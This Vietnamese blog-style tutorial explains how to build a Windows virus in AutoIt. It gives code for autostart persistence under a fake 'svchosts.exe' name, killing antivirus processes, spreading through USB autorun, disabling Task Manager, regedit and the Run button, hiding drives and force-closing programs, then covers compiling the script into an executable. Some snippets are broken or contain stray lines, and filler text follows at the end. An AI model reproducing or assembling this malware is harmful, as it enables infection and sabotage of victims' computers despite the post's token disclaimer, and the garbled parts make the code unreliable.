code tạo virus bằng autoit (.au3)
Chắc các bạn không con xa lạ với phần mềm autoit nữa nên mình hướng dẫn và cho các bạn những code để tạo ra một con virus và xin nhắc lại là không dùng những con virus này để đem phá hoại người khác.
Đây là link download phần mềm autoit mình tự tay upload nên không sợ có virus hoặc link died nếu có xin hãy báo cho minh để mình upload link mới:
http://www.mediafire.com/?okwmy8xyxp3joh1
còn bây giờ là thì minh sẽ cho các bạn xem một số Code:
1)chức năng làm di chuột lung tung:
Code:
$dai = @DesktopWidth
$rong = @DesktopHeight
for $i = 1 to 2 step 1
$i=$i-1
MouseMove($dai,$rong)
$dai = random (1,@DesktopWidth,1)
$rong = random (1,@DesktopHeight,1)
sleep(10)
2)Chức năng làm lây nhiễm qua USB:
Code:
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","svchosts","REG_SZ", "C:\Windows\system32\svchosts.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "svchosts", "REG_SZ","C:\Windows\system32\svchosts.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","Hidden","REG_DWORD", 1)
ProcessClose("avp.exe")
ProcessClose("avp.exe")
ProcessClose("Bkav2006.exe")
3)Lây nhiễm Trojan và Autorun
Code:
Dim $autorun = "[autorun]" & @CRLF & "open=svchosts.exe" & @CRLF & "SHELl\opEn\defaUlt=1" & @CRLF & "sHell\eXpLore\CommaND=svchosts.exe"
if not fileexists("C:\Autorun.inf") Then
filewrite("C:\Autorun.inf",$autorun)
endif
fileDelete("C:\Autorun.inf")
filewrite("C:\Autorun.inf",$autorun)
FileCopy(@ScriptDir & "\service.exe","C:\Windows\system32",1)
run("C:\Windows\system32\service.exe")
FileCopy(@ScriptDir & "\svchosts.exe","C:\Windows\system32",1)
while 1
$var = DriveGetDrive( "REMOVABLE" )
If NOT @error Then
FileCopy(@ScriptFullPath,$var[0],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy("C:\Autorun.inf",$var[0],1)
For $i = 1 to $var[0]
FileCopy("C:\Autorun.inf",$var[$i],1)
FileCopy("C:\Windows\system32\service.exe",$var,1)
FileCopy(@ScriptFullPath,$var[$i],1)
Next
EndIf
wend
loadt2player(402);
4)Để không phát hiện trên taskbar:
Code:
#Notrayicon
5)Lệnh này để tự động copy file mà bạn muốn:
Code:
FileCopy(@ScriptDir & "\ten file.exe","C:\WINDOWS",1)
lệnh khắc phục:
Code:
FileDelete("C:\Windows\ten file.exe")
6)Lệnh này dùng để khởi động con virus khi bật máy tính lên:
Code:
("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run","explorer","REG_SZ",@WindowsDir & "\ten file.exe")
Lệnh khắc phục:
Code:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurentVersion\Run","explorer")
7)Lệnh này dùng để khóa taskmanager:
Code:
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")
Lệnh khắc phục:
Code:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr")
8)Lệnh này khóa regedit:
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")
Lệnh khắc phục:
Code:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools")
9)Lệnh làm mất nút run trong windows:
Code:
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun","REG_DWORD","1")
Lệnh khắc phục:
Code:
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoRun")
10)Lệnh này làm vô hiệu hóa thùng rác:
Code:
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete","RED_DWORD","1")
Lệnh khắc phục:
Code:
RegDelete("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete")
11)Lệnh này khóa ổ đĩa của nạn nhân:
Code:
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108863")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")
Lệnh khắc phục:
Code:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoViewOnDrive")
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoDrives")
12)Lệnh này làm mất nút Shutdown ở trong Start:
Code:
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose","REG_DWORD","1")
Lệnh khắc phục:
Code:
RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoClose")
13)lệnh này không cho mở 1 chương trình nào:
Code:
$VA = ProcessExists("iexplore.exe")
$RA = ProcessClose("iexplore.exe")
$BU = ProcessExists("winamp.exe")
$BA = ProcessClose("winamp.exe")
While 1
if $VA then $RA
$RA = ProcessClose("iexplore.exe")
if $BU then $BA
$BA = ProcessClose("winamp.exe")
cách khác là:
Code:
ProcessExists("tên chương trình cần thoát")
Ví dụ:
ProcessExists("iexplore.exe")
ProcessExists("winamp.exe")
Hoặc là dùng:
Code:
ProcessClose("tên chương trình cần đóng")
Ví dụ:
ProcessClose("iexplore.exe")
ProcessClose("winamp.exe")
Tùy bạn lựa chọn.
14)Lệnh này có thể làm reset, tắt máy:
Code:
Shutdown(thông số)
Còn đây là các thông số:
0:log off
1: shutdown
2: restart
4: Force
8: Powerdown
32: Stanby
64: Hibernate
Thông số 4,8,64 chỉ dành cho win cao hơn win XP.
15)lệnh đợi,dừng:
Code:
Sleep(seconds)
Trong đó seconds là giây bạn phải nhập vào đó bắt đầu từ 1000 là 1 giây đến bao nhiêu thì tùy các bạn.
Đã hết còn một số vấn đề là một số các ban chưa biết cách sử dụng autoit
Minh xin hướng dẫn luôn:
Bước 1: Bạn phải có phần mềm Autoit nến ai chưa có thì mình đã đưa link phần mềm ngay trên đầu bài rồi.
Bước 2: Cài đặt (cái này quá dễ nên các bạn tự cài đặt được)
Nhưng đến phần này thì bạn nên chọn Edit the script đây là hình ảnh đấy:
Bước 3 : Các bạn mở notepad hoặc bạn click chuột trái vào thanh start -> AutoIt v3 -> SciTE Script Editor rồi nó sẽ hiện ra một cái bảng và bạn gõ code vào thôi. Nhưng bạn nên nhớ rằng viết trên notepad thì bạn phải lưu đuôi dưới dạng .au3 nhé.
Bước 4: Chuyển đổi file .au3 thành File .exe thôi nào bạn click vào thanh start -> AutoIt v3 -> Compile Script to .exe vào nó sẽ hiên một cái bảng như thế này:
Bước 5: bước cuối cùng bạn đã đặt tất cả các thứ vào rồi bạn chỉ việc bấm Convert thôi là bạn đã có một file .exe rồi
Xin chúc các bạn thành công.
This is dummy text. It is not meant to be read. Accordingly, it is difficult to figure out when to end it. But then, this is dummy text. It is not meant to be read. Period.
ConversionConversion EmoticonEmoticon